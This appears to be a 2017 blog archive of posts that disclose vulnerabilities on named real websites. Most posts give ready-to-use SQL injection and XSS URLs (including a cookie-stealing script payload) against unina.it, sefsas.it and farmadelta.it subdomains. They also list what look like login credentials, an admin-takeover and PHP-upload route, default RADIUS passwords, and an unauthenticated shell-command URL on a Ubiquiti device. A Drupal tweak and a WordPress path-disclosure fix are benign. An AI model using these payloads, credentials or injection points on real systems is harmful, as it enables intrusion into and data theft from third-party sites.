
Showing posts from November, 2017

How to fix drupal installation with 32bit php version

Install Drupal on a server with a 32-bit version of PHP.
If you want to install Drupal on your TEST server even though you only have a 32-bit version of PHP, you need to edit:
core/modules/system/system.install
and comment out the following block (around line 973), which otherwise raises the 32-bit requirement warning:


  if (PHP_INT_SIZE <= 4) {
    $requirements['limited_date_range'] = [
      'title' => t('Limited date range'),
      'value' => t('Your PHP installation has a limited date range.'),
      'description' => t('You are running on a system where PHP is compiled or limited to using 32-bit integers. This will limit the range of dates and timestamps to the years 1901-2038. Read about the <a href=":url">limitations of 32-bit PHP</a>.', [':url' => 'https://www.drupal.org/docs/8/system-requirements/limitations-of-32-bit-php']),
      'severity' => REQUIREMENT_WARNING,
    ];
  }

It's highly suggested to update to a recent 64bit version of PHP.

unina.it/ | blind sql injection, xss, data leak, system compromise etc

There's a sort of WAF on all the websites but it can be easily tricked by not using the most common terms like /passwd, etc.
-
http://www.dieti.unina.it
Ubuntu
Joomla 2.5.8

Admin can be changed (admin takeover) even if there's the external login for the users.
PHP files can be uploaded via
administrator/components/com_media/helpers/media.php

com_gcalendar is vulnerable and should be upgraded to dpcalendar.

---

http://www.digita.unina.it/
wordpress 4.8.1
http://www.digita.unina.it/digita/wp-login.php
sds_dj32f
lizzi

---

http://www.elettrotecnica.unina.it/grupponazionale/vedirisorsa.php?ID=[blind sql]

archived error: http://archive.is/Zw3Ua
/home/httpd/elettrotecnica/grupponazionale/

---
XSS
http://www.comeallacorte.unina.it/ediz_precedenti.php?ediz=2007-2008%3Cscript%3Ealert(document.cookie);%3C/script%3E

---

SQL Injection
http://www.filclass.unina.it/dett_news.php?news_id=[SQL Injection]62&area_id=7

sample error archived: http://archive.is/2SO9a

select DATE_FORMAT(ne…

sefsas.it | sql injection

SQL injection in the email confirmation URL (there are several others):

http://bandi.sefsas.it/v3/store/actmail.asp?ida=[reg id]&cod=[sqlinjection]&idc=[customer id]

ex.: http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod='&idc=9999
archived: http://archive.is/kwwXf

Full query sample in the output:

http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod=7913694013691841369169&idc=9999

SELECT AFFILIATE_ID, IDCUSTOMERTYPE, NAME, LASTNAME, EMAIL, CUSTOMERCOMPANY, ACTIVITY_ID, REGION_ID FROM CUSTOMERS WHERE IDCUSTOMER=9999 AND REMIP=''

archived: http://archive.is/xDVeh
XSS
https://www.farmadelta.it/ricerca-farmaci.html?strpro=11111"><script>alert(document.cookie);</script>


SQL Injection
https://www.farmadelta.it/pagina2.asp?pag=cat2&cat=275'&strcat=Animali%20Domestici

archived error: http://archive.is/9bJfo

WordPress <=4.8.3 - how to raise errors and (possibly) get the path + [FIX]

Simple fix (add at the top of each affected file so that it exits when requested directly, outside of the WordPress bootstrap):
if (!defined('ABSPATH')) exit;

URLs that can give you errors with local folder paths on WordPress 4.8.3 and previous versions:
/wp-includes/customize/class-wp-customize-background-image-control.php
/wp-includes/customize/class-wp-customize-background-image-setting.php
/wp-includes/customize/class-wp-customize-background-position-control.php
/wp-includes/customize/class-wp-customize-color-control.php
/wp-includes/customize/class-wp-customize-cropped-image-control.php
/wp-includes/customize/class-wp-customize-custom-css-setting.php
/wp-includes/customize/class-wp-customize-filter-setting.php
/wp-includes/customize/class-wp-customize-header-image-control.php
/wp-includes/customize/class-wp-customize-header-image-setting.php
/wp-includes/customize/class-wp-customize-image-control.php
/wp-includes/customize/class-wp-customize-media-control.php
/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php
/wp-includes/customize/class-wp-customize-nav…

Linux Day 2017 Guardia Sanframondi - various stuff discovered

During the Linux Day 2017 at Guardia Sanframondi I played with my phone on the local network ... with the browser (and Google to get information on vulnerabilities).

-Linuxday wifi-

daloRADIUS default password
user:administrator
password:radius
admin/admin
ip:192.168.1.249
http://192.168.1.249

Ubiquiti device (wifi antenna/AP)
ip:192.168.1.20
Unauthenticated command execution
https://192.168.1.20/pingtest_action.cgi?command=[anyshellcommand]